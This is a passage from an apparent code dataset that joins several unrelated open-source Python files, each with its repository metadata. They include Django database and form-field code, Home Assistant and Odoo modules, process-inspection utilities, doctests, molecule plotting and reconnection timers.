'iendswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
}
_likec_operators = _standard_operators.copy()
_likec_operators.update({
'contains': "LIKEC %s ESCAPE '\\'",
'icontains': "LIKEC UPPER(%s) ESCAPE '\\'",
'startswith': "LIKEC %s ESCAPE '\\'",
'endswith': "LIKEC %s ESCAPE '\\'",
'istartswith': "LIKEC UPPER(%s) ESCAPE '\\'",
'iendswith': "LIKEC UPPER(%s) ESCAPE '\\'",
})
# The patterns below are used to generate SQL pattern lookup clauses when
    # the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
    pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\', '\\'), '%%', '\%%'), '_', '\_')"
_pattern_ops = {
'contains': "'%%' || {} || '%%'",
'icontains': "'%%' || UPPER({}) || '%%'",
'startswith': "{} || '%%'",
'istartswith': "UPPER({}) || '%%'",
'endswith': "'%%' || {}",
'iendswith': "'%%' || UPPER({})",
}
_standard_pattern_ops = {k: "LIKE TRANSLATE( " + v + " USING NCHAR_CS)"
" ESCAPE TRANSLATE('\\' USING NCHAR_CS)"
for k, v in _pattern_ops.items()}
_likec_pattern_ops = {k: "LIKEC " + v + " ESCAPE '\\'"
for k, v in _pattern_ops.items()}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
use_returning_into = self.settings_dict["OPTIONS"].get('use_returning_into', True)
self.features.can_return_id_from_insert = use_returning_into
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def _connect_string(self):
settings_dict = sel
|
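A small illustration of how the _pattern_ops templates above are filled in; the column expression is invented, and the doubled '%%' is later consumed by the driver's parameter interpolation.
# 'contains' template applied to an escaped column expression (illustrative only):
template = "'%%' || {} || '%%'"
print(template.format('"AUTHOR"."NAME"'))  # -> '%%' || "AUTHOR"."NAME" || '%%'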
rohitranjan1991/home-assistant
|
homeassistant/components/screenlogic/services.py
|
Python
|
mit
| 3,148
| 0.001906
|
"""Services for ScreenLogic integration."""
import logging
from screenlogicpy import ScreenLogicError
import voluptuous as vol
from homeassistant.core import HomeAssistant, ServiceCall, callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_extract_config_entry_ids
from .const import (
ATTR_COLOR_MODE,
DOMAIN,
SERVICE_SET_COLOR_MODE,
SUPPORTED_COLOR_MODES,
)
_LOGGER = logging.getLogger(__name__)
SET_COLOR_MODE_SCHEMA = cv.make_entity_service_schema(
{
vol.Required(ATTR_COLOR_MODE): vol.In(SUPPORTED_COLOR_MODES),
},
)
@callback
def async_load_screenlogic_services(hass: HomeAssistant):
"""Set up services for the ScreenLogic integration."""
if hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
# Integration-level services have already been added. Return.
return
async def extract_screenlogic_config_entry_ids(service_call: ServiceCall):
return [
entry_id
for entry_id in await async_extract_config_entry_ids(hass, service_call)
if (entry := hass.config_entries.async_get_entry(entry_id))
and entry.domain == DOMAIN
]
async def async_set_color_mode(service_call: ServiceCall) -> None:
if not (
screenlogic_entry_ids := await extract_screenlogic_config_entry_ids(
service_call
)
):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'. Config entry for target not found"
)
color_num = SUPPORTED_COLOR_MODES[service_call.data[ATTR_COLOR_MODE]]
for entry_id in screenlogic_entry_ids:
coordinator = hass.data[DOMAIN][entry_id]
_LOGGER.debug(
"Service %s called on %s with mode %s",
SERVICE_SET_COLOR_MODE,
coordinator.gateway.name,
color_num,
)
try:
if not await coordinator.gateway.async_set_color_lights(color_num):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'"
)
# Debounced refresh to catch any secondary
# changes in the device
await coordinator.async_request_refresh()
except ScreenLogicError as error:
raise HomeAssistantError(error) from error
hass.services.async_register(
DOMAIN, SERVICE_SET_COLOR_MODE, async_set_color_mode, SET_COLOR_MODE_SCHEMA
)
@callback
def async_unload_screenlogic_services(hass: HomeAssistant):
"""Unload services for the ScreenLogic integration."""
if hass.data[DOMAIN]:
# There is still another config entry for this domain, don't remove services.
return
|
if not hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
return
_LOGGER.info("Unloading ScreenLogic Services")
hass.services.async_remove(domain=DOMAIN, service=SERVICE_SET_COLOR_MODE)
|
ddico/odoo
|
addons/website_event/models/website.py
|
Python
|
agpl-3.0
| 491
| 0.004073
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, _
from odoo.addons.http_routing.models.ir_http import url_for
class Website(models.Model):
_inherit = "website"
def get_suggested_controllers(self):
suggested_controllers = super(Website, self).get_suggested_controllers()
        suggested_controllers.append((_('Events'), url_for('/event'), 'website_event'))
return suggested_controllers
|
drimer/NetControl
|
netcontrol/test/util/test_singleton.py
|
Python
|
gpl-2.0
| 593
| 0.001686
|
from unittest import TestCase
from netcontrol.util import singleton
@singleton
class SingletonClass(object):
pass
@singleton
class SingletonClassWithAttributes(object):
@classmethod
def setup_attributes(cls):
cls.value = 1
class SingletonTest(TestCase):
def test_that_only_instance_is_created(self):
obj_one = SingletonClass()
obj_two = SingletonClass()
self.assertIs(obj_one, obj_two)
    def test_that_instance_is_created_using_setup_method(self):
obj = SingletonClassWithAttributes()
self.assertEqual(1, obj.value)
|
jumoconnect/openjumo
|
jumodjango/etc/credit_card_fields.py
|
Python
|
mit
| 4,687
| 0.00256
|
import re
from datetime import date
from calendar import monthrange, IllegalMonthError
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
# from - https://github.com/bryanchow/django-creditcard-fields
CREDIT_CARD_RE = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\d{11})$'
MONTH_FORMAT = getattr(settings, 'MONTH_FORMAT', '%b')
VERIFICATION_VALUE_RE = r'^([0-9]{3,4})$'
class CreditCardField(forms.CharField):
"""
Form field that validates credit card numbers.
"""
default_error_messages = {
'required': _(u'Please enter a credit card number.'),
'invalid': _(u'The credit card number you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '').replace('-', '')
if self.required and not value:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(CREDIT_CARD_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
class ExpiryDateWidget(forms.MultiWidget):
"""
Widget containing two select boxes for selecting the month and year.
"""
def decompress(self, value):
return [value.month, value.year] if value else [None, None]
def format_output(self, rendered_widgets):
return u'<div class="expirydatefield">%s</div>' % ' '.join(rendered_widgets)
class ExpiryDateField(forms.MultiValueField):
"""
Form field that validates credit card expiry dates.
"""
default_error_messages = {
'invalid_month': _(u'Please enter a valid month.'),
'invalid_year': _(u'Please enter a valid year.'),
'date_passed': _(u'This expiry date has passed.'),
}
def __init__(self, *args, **kwargs):
today = date.today()
error_messages = self.default_error_messages.copy()
if 'error_messages' in kwargs:
error_messages.update(kwargs['error_messages'])
if 'initial' not in kwargs:
# Set default expiry date based on current month and year
kwargs['initial'] = today
months = [(x, '%02d (%s)' % (x, date(2000, x, 1).strftime(MONTH_FORMAT))) for x in xrange(1, 13)]
years = [(x, x) for x in xrange(today.year, today.year + 15)]
fields = (
forms.ChoiceField(choices=months, error_messages={'invalid': error_messages['invalid_month']}),
forms.ChoiceField(choices=years, error_messages={'invalid': error_messages['invalid_year']}),
)
super(ExpiryDateField, self).__init__(fields, *args, **kwargs)
self.widget = ExpiryDateWidget(widgets=[fields[0].widget, fields[1].widget])
def clean(self, value):
expiry_date = super(ExpiryDateField, self).clean(value)
if date.today() > expiry_date:
raise forms.ValidationError(self.error_messages['date_passed'])
return expiry_date
def compress(self, data_list):
if data_list:
try:
month = int(data_list[0])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_month'])
try:
year = int(data_list[1])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_year'])
try:
day = monthrange(year, month)[1] # last day of the month
except IllegalMonthError:
raise forms.ValidationError(self.error_messages['invalid_month'])
except ValueError:
raise forms.ValidationError(self.error_messages['invalid_year'])
return date(year, month, day)
return None
class VerificationValueField(forms.CharField):
"""
Form field that validates credit card verification values (e.g. CVV2).
See http://en.wikipedia.org/wiki/Card_Security_Code
"""
widget = forms.TextInput(attrs={'maxlength': 4})
default_error_messages = {
'required': _(u'Please enter the three- or four-digit verification code for your credit card.'),
'invalid': _(u'The verification value you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '')
if not value and self.required:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(VERIFICATION_VALUE_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
|
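A hedged sketch of using the fields above in a Django form; the form class and labels are illustrative and assume the three fields are imported from the module shown.
# Hypothetical payment form assembled from the fields defined above.
from django import forms

class PaymentForm(forms.Form):
    card_number = CreditCardField(label='Card number')
    expiry = ExpiryDateField(label='Expiry date')
    verification = VerificationValueField(label='Security code')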
FrostyX/tracer
|
tracer/resources/processes.py
|
Python
|
gpl-2.0
| 9,071
| 0.026127
|
#-*- coding: utf-8 -*-
# processes.py
# Module providing informations about processes
#
# Copyright (C) 2016 Jakub Kadlcik
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from .collections import ProcessesCollection
from .FilenameCleaner import FilenameCleaner
import psutil
import datetime
import time
import os
import re
from subprocess import PIPE, Popen
from threading import Timer
from six import with_metaclass
class Processes(object):
# psutil 3.x to 1.x backward compatibility
@staticmethod
def pids():
try:
return psutil.pids()
except AttributeError:
return psutil.get_pid_list()
@staticmethod
def all():
processes = ProcessesCollection()
for pid in Processes.pids():
try:
processes.append(Process(pid))
except psutil.NoSuchProcess: pass
except psutil.AccessDenied: pass
return processes
class ProcessWrapper(object):
"""
Wrapper for ``psutil.Process class``
Library ``psutil`` is not backward compatible from version 2.x.x to 1.x.x.
Purpose of this class is cover incompatibility in ``psutil.Process`` class and
provide interface of new version. It allows using new interface even with
old version of ``psutil``.
Note that, for performance reasons, process information is cached at
object creation. To force a refresh, invoke the ``rebuild_cache()``
method.
"""
def __init__(self, pid=None):
self._process = psutil.Process(pid)
self.rebuild_cache()
def __nonzero__(self):
return bool(self._process)
def rebuild_cache(self):
self._procdict = self._process.as_dict(attrs=['name', 'exe', 'cmdline', 'ppid', 'username', 'create_time'])
def name(self):
        # Special case for sshd: if its cmdline contains the executable it must be the daemon,
        # otherwise it must be the session.
try:
if self._attr("name") == 'sshd':
if self._attr("exe") not in self._attr("cmdline") and len(self._attr("cmdline")) > 1:
return 'ssh-{0}-session'.format(re.split(' |@',' '.join(self._attr("cmdline")))[1])
except psutil.AccessDenied:
pass
return self._attr("name")
def exe(self):
return self._attr("exe")
def cmdline(self):
return self._attr("cmdline")
def ppid(self):
return self._attr("ppid")
def parent(self):
return self._attr("parent")
def username(self):
return self._attr("username")
def create_time(self):
return self._attr("create_time")
def children(self, recursive=False):
key = 'children-{0}'.format(recursive)
if key not in self._procdict:
try:
self._procdict[key] = self._process.children(recursive)
except AttributeError:
self._procdict[key] = self._process.get_children(recursive)
return self._procdict[key]
def _attr(self, name):
if name not in self._procdict:
attr = getattr(self._process, name)
try:
self._procdict[name] = attr()
except TypeError:
self._procdict[name] = attr
return self._procdict[name]
def __getattr__(self, item):
return getattr(self._process, item)
# psutil 3.x to 1.x backward compatibility
def memory_maps(self, grouped=True):
key = 'memory_maps-{0}'.format(grouped)
if key not in self._procdict:
try:
self._procdict[key] = self._process.memory_maps(grouped=grouped)
except AttributeError:
self._procdict[key] = self._process.get_memory_maps(grouped=grouped)
return self._procdict[key]
class ProcessMeta(type):
"""
Caching metaclass that ensures that only one ``Process`` object is ever
instantiated for any given PID. The cache can be cleared by calling
``Process.reset_cache()``.
Based on https://stackoverflow.com/a/33458129
"""
def __init__(cls, name, bases, attributes):
super(ProcessMeta, cls).__init__(name, bases, attributes)
def reset_cache():
cls._cache = {}
reset_cache()
setattr(cls, 'reset_cache', reset_cache)
def __call__(cls, *args, **kwargs):
pid = args[0]
if pid not in cls._cache:
self = cls.__new__(cls, *args, **kwargs)
cls.__init__(self, *args, **kwargs)
cls._cache[pid] = self
return cls._cache[pid]
class Process(with_metaclass(ProcessMeta, ProcessWrapper)):
"""
Represent the process instance uniquely identifiable through PID
For all class properties and methods, please see
http://pythonhosted.org/psutil/#process-class
Below listed are only reimplemented ones.
For performance reasons, instances are cached based on PID, and
multiple instantiations of a ``Process`` object with the same PID will
return the same object. To clear the cache, invoke
``Process.reset_cache()``. Additionally, as with ``ProcessWrapper``,
process information is cached at object creation. To force a refresh,
invoke the ``rebuild_cache()`` method on the object.
"""
    def __eq__(self, process):
        """For our purposes, two processes are equal when they have the same PID"""
return self.pid == process.pid
def __ne__(self, process):
return not self.__eq__(process)
def __hash__(self):
return hash(self.pid)
@staticmethod
def safe_isfile(file_path, timeout=0.5):
"""
Process arguments could be referring to files on remote filesystems and
os.path.isfile will hang forever if the shared FS is offline.
Instead, use a subprocess that we can time out if we can't reach some file.
"""
process = Popen(['test', '-f', file_path], stdout=PIPE, stderr=PIPE)
timer = Timer(timeout, process.kill)
try:
timer.start()
process.communicate()
return process.returncode == 0
finally:
timer.cancel()
@property
def files(self):
files = []
# Files from memory maps
for mmap in self.memory_maps():
files.append(FilenameCleaner.strip(mmap.path))
# Process arguments
for arg in self.cmdline()[1:]:
if not os.path.isabs(arg):
continue
if Process.safe_isfile(arg):
files.append(arg)
return sorted(files)
def parent(self):
"""The parent process casted from ``psutil.Process`` to tracer ``Process``"""
if self.ppid():
return Process(self.ppid())
return None
def username(self):
"""The user who owns the process. If user was deleted in the meantime,
        ``None`` is returned instead."""
# User who run the process can be deleted
try:
return super(Process, self).username()
except KeyError:
return None
    def children(self, recursive=False):
        """The collection of process's children. Each of them casted from ``psutil.Process``
to tracer ``Process``."""
children = super(Process, self).children(recursive)
return ProcessesCollection([Process(child.pid) for child in children])
@property
def exe(self):
"""The absolute path to process executable. Cleaned from arbitrary strings
which appears on the end."""
# On Gentoo, there is #new after some files in lsof
# i.e. /usr/bin/gvim#new (deleted)
exe = super(Process, self).exe()
if exe.endswith('#new'):
exe = exe[0:-4]
# On Fedora, there is something like ;541350b3 after some files in lsof
if ';' in exe:
exe = exe[0:exe.index(';')]
return exe
@property
def is_interpreted(self):
# @TODO implement better detection of interpreted processes
return self.name() in ["python"]
@property
def is_session(self):
terminal = self.terminal()
if terminal is None:
return None
parent = self.parent()
if parent is None or terminal != parent.terminal():
return True
@property
def real_name(self):
if self.is_interpreted:
for arg in self.cmdline()[1:]:
if os.path.isfile(arg):
return os.path.basename(arg)
return self.name()
@property
def str_started_ago(self):
"""
The time of how long process is running. Returned as string
in format ``XX unit`` where unit is one of
|
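A short sketch of the PID-based caching described in the Process/ProcessMeta docstrings above; it assumes Process is imported from tracer.resources.processes and that psutil can read the current PID.
import os
p1 = Process(os.getpid())
p2 = Process(os.getpid())
assert p1 is p2            # same PID -> same cached object (ProcessMeta._cache)
Process.reset_cache()      # drop the per-PID cache
assert Process(os.getpid()) is not p1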
xfire/guppy
|
test/doctest_assertions.py
|
Python
|
gpl-2.0
| 3,440
| 0
|
#!/usr/bin/env python
#
# vim:syntax=python:sw=4:ts=4:expandtab
"""
test hasAttributes()
---------------------
>>> from guppy import hasAttributes
>>> class Foo(object):
... def __init__(self):
... self.a = 23
... self.b = 42
>>> hasAttributes('a')(Foo())
True
>>> hasAttributes('b')(Foo())
True
>>> hasAttributes('a', 'b')(Foo())
True
>>> hasAttributes('c')(Foo())
False
"""
"""
test hasMethods()
-----------------
>>> from guppy import hasMethods
>>> class Bar(object):
... def a(self): return 23
... def b(self): return 42
>>> hasMethods('a')(Bar())
True
>>> hasMethods('b')(Bar())
True
>>> hasMethods('b', 'a')(Bar())
True
>>> hasMethods('c')(Bar())
False
"""
"""
test isInstanceOf()
-------------------
>>> from guppy import isInstanceOf
>>> class BA(object): pass
>>> class BB(object): pass
>>> class C(BA, BB): pass
>>> isInstanceOf(str)("test")
True
>>> isInstanceOf(list)([1,2,3])
True
>>> isInstanceOf(dict)(dict(a = 23))
True
>>> isInstanceOf(BA, BB, C)(C())
True
>>> isInstanceOf(int)("test")
False
>>> isInstanceOf(list)("test")
False
>>> isInstanceOf(BB, C)(BA())
False
"""
"""
test implementProtocol()
------------------------
>>> from guppy import implementProtocol, Protocol
>>> class FooBarProtocol(Protocol):
... def foo(): pass
... def bar(): pass
>>> class SpamEggsProtocol(Protocol):
... def spam(): pass
... def eggs(): pass
>>> class AllProtocol(FooBarProtocol, SpamEggsProtocol): pass
>>> class FooBar(object):
... def foo(): pass
... def bar(): pass
>>> class SpamEggs(object):
... def spam(): pass
... def eggs(): pass
>>> class AllInherit(FooBar, SpamEggs): pass
>>> class All(object):
... def foo(): pass
... def bar(): pass
... def spam(): pass
... def eggs(): pass
>>> implementProtocol(FooBarProtocol)(FooBar())
True
>>> implementProtocol(SpamEggsProtocol)(FooBar())
False
>>> implementProtocol(AllProtocol)(FooBar())
False
>>> implementProtocol(SpamEggsProtocol)(SpamEggs())
True
>>> implementProtocol(FooBarProtocol)(SpamEggs())
False
>>> implementProtocol(AllProtocol)(SpamEggs())
False
>>> implementProtocol(SpamEggsProtocol)(All())
True
>>> implementProtocol(FooBarProtocol)(All())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(All())
True
>>> implementProtocol(AllProtocol)(All())
True
>>> implementProtocol(SpamEggsProtocol)(AllInherit())
True
>>> implementProtocol(FooBarProtocol)(AllInherit())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(AllInherit())
True
>>> implementProtocol(AllProtocol)(AllInherit())
True
>>> implementProtocol(SpamEggsProtocol)('')
False
>>> implementProtocol(FooBarProtocol)('')
False
>>> implementProtocol(AllProtocol)('')
False
>>> implementProtocol(str)('')
True
>>> implementProtocol(list)('')
False
>>> implementProtocol(list)([])
True
>>> implementProtocol(str)([])
False
>>> implementProtocol(dict)({})
True
>>> implementProtocol(list)({})
False
"""
|
ella/django-ratings
|
tests/example_project/settings/config.py
|
Python
|
bsd-3-clause
| 1,465
| 0.004778
|
from tempfile import gettempdir
from os.path import join, dirname
import example_project
ADMINS = (
)
MANAGERS = ADMINS
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
DATABASE_ENGINE = 'sqlite3'
DATABASE_NAME = join(gettempdir(), 'django_ratings_example_project.db')
TEST_DATABASE_NAME = join(gettempdir(), 'test_django_ratings_example_project.db')
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
TIME_ZONE = 'Europe/Prague'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = '88b-01f^x4lh$-s5-hdccnicekg07)niir2g6)93!0#k(=mfv$'
EMAIL_SUBJECT_PREFIX = 'Example project admin: '
# templates for this app
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
# TODO: Fix logging
# init logger
#LOGGING_CONFIG_FILE = join(dirname(testbed.__file__), 'settings', 'logger.ini')
#if isinstance(LOGGING_CONFIG_FILE, basestring) and isfile(LOGGING_CONFIG_FILE):
# logging.config.fileConfig(LOGGING_CONFIG_FILE)
# LOGGING_CONFIG_FILE = join( dirname(__file__), 'logger.conf')
# we want to reset whole cache in test
# until we do that, don't use cache
CACHE_BACKEND = 'dummy://'
# session expire
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# disable double render in admin
# DOUBLE_RENDER = False
MEDIA_ROOT = join(dirname(example_project.__file__), 'static')
MEDIA_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin_media/'
|
ajkerr0/kappa
|
kappa/plot.py
|
Python
|
mit
| 16,060
| 0.022167
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 22 14:18:45 2016
@author: Alex Kerr
Define functions that draw molecule objects.
"""
import copy
from itertools import cycle
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
from .molecule import chains
plt.close("all")
atomColors = {1:"white",6:"black",7:"skyblue",8:"red",9:"green",15:"orange",16:"yellow",17:"green",35:"orange",
21:"white", 22:"red", 23:"green", 24:"blue", 25:"orange"}
atomicRadii = {1:25,6:70,7:65,8:60,9:50,15:100,16:100,17:100,35:115,
21:120, 22:150, 23:190, 24:200, 25:210}
radList = np.zeros(max(list(atomicRadii.items()))[0]+1, dtype=np.int16)
for key,value in atomicRadii.items():
radList[key] = value
def bonds(molecule, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4.):
"""Draw a 2d 'overhead' view of a molecule."""
fig = plt.figure()
figTitle = molecule.name
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList],c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
fig.suptitle(figTitle, fontsize=18)
plt.axis('equal')
plt.xlabel('x-position', fontsize=13)
plt.ylabel('y-position', fontsize=13)
plt.show()
def bondsax(molecule, ax, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4., size_scale=1.):
"""Draw a 2d 'overhead' view of a molecule.
|
"""
plt.sca(ax)
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
            cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList]*size_scale,c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
plt.axis('equal')
plt.show()
def scatter_obj(size_scale, fs):
"""
Return a scatter object for legend purposes.
"""
fig, ax = plt.subplots()
x,y = [], []
c, s = [],[]
for i, z, name in zip(np.arange(6), [1,6,9,17,35], ['H', 'C', 'F', 'Cl', 'Br']):
x.append(0.)
y.append(-i*.2)
c.append(atomColors[z])
s.append(1.5*size_scale*radList[z])
ax.text(.005, -i*.2, name, fontsize=fs)
ax.scatter(x,y , c=c, s=s, edgecolors='k')
ax.axis('off')
def bonds3d(molecule, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
figTitle = molecule.name
plotSize = 5
posList = molecule.posList/molecule.ff.lunits
length = len(posList)
for bond in molecule.bondList:
i,j = bond
ax.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
[posList[i][2],posList[j][2]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
ax.scatter(posList[:,0],posList[:,1],posList[:,2],
s=radList[molecule.zList],c=cList,
marker='o',depthshade=False,
edgecolors='k')
if indices:
ds = 0.1
for index,pos in enumerate(posList):
x,y,z = pos
ax.text(x+ds,y+ds,z+ds,str(index),color="blue")
fig.suptitle(figTitle, fontsize=18)
ax.grid(False)
ax._axis3don = False
ax.set_xlim3d(-plotSize,plotSize)
ax.set_ylim3d(-plotSize,plotSize)
ax.set_zlim3d(-plotSize,plotSize)
ax.set_xlabel('x-position' + ' (' + r'$\AA$' + ')')
ax.set_ylabel('y-position' + ' (' + r'$\AA$' + ')')
ax.set_zlabel('z-position' + ' (' + r'$\AA$' + ')')
if save:
plt.savefig("./kappa_save/%s.png" % molecule.name)
plt.show()
def bonds3d_list(molList, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
|
petxo/clitellum
|
clitellum/endpoints/channels/reconnectiontimers.py
|
Python
|
gpl-3.0
| 3,471
| 0.007779
|
from time import sleep
import math
__author__ = 'sergio'
## @package clitellum.endpoints.channels.reconnectiontimers
# This package contains the classes for the reconnection timers
#
## Factory method that creates an instance of an instant timer
def CreateInstantTimer():
    return InstantReconnectionTimer()
## Factory method that creates an instance of a logarithmic timer
def CreateLogarithmicTimer():
    return LogarithmicReconnectionTimer()
## Factory method that creates an instance of a constant-time timer
def CreateConstantTimer(waiting_time=5):
return ConstantReconnectionTimer(waiting_time=waiting_time)
## Creates a timer according to the specified type
# @param type Timer type: "Instant", "Logarithmic"
def CreateTimerFormType(type):
if type == "Instant":
return CreateInstantTimer()
elif type == 'Constant':
return ConstantReconnectionTimer()
else:
return CreateLogarithmicTimer()
## Creates a timer from a configuration
# { type :'Instant' }
# { type :'Constant', time : 10 }
# { type :'Logarithmic' }
def CreateTimerFormConfig(config):
if config['type'] == "Instant":
return CreateInstantTimer()
elif config['type'] == 'Constant':
        if config.get('time') is not None:
return ConstantReconnectionTimer(config['time'])
else:
return ConstantReconnectionTimer()
else:
return CreateLogarithmicTimer()
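# Illustrative usage sketch (not part of the original module): the config dicts
# documented above map straight onto the factory functions, e.g.
#   timer = CreateTimerFormConfig({'type': 'Constant', 'time': 10})
#   timer.wait()    # sleeps for 10 seconds
#   timer.reset()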
## Base class that provides the basic structure of a reconnection timer
class ReconnectionTimer:
    ## Creates an instance of the reconnection timer
def __init__(self):
pass
    ## Waits one turn of the cycle before continuing
def wait(self):
pass
    ## Resets the timer
def reset(self):
pass
## Class that provides an instant reconnection timer;
# there is no waiting time between one cycle and the next
class InstantReconnectionTimer(ReconnectionTimer):
    ## Creates an instance of the instant timer
def __init__(self):
ReconnectionTimer.__init__(self)
    ## Converts the instance to a string
def __str__(self):
return "Instant Reconnection Timer"
## Defines a reconnection timer in which the waiting time between one cycle
# and the next grows logarithmically.
class LogarithmicReconnectionTimer(ReconnectionTimer):
def __init__(self):
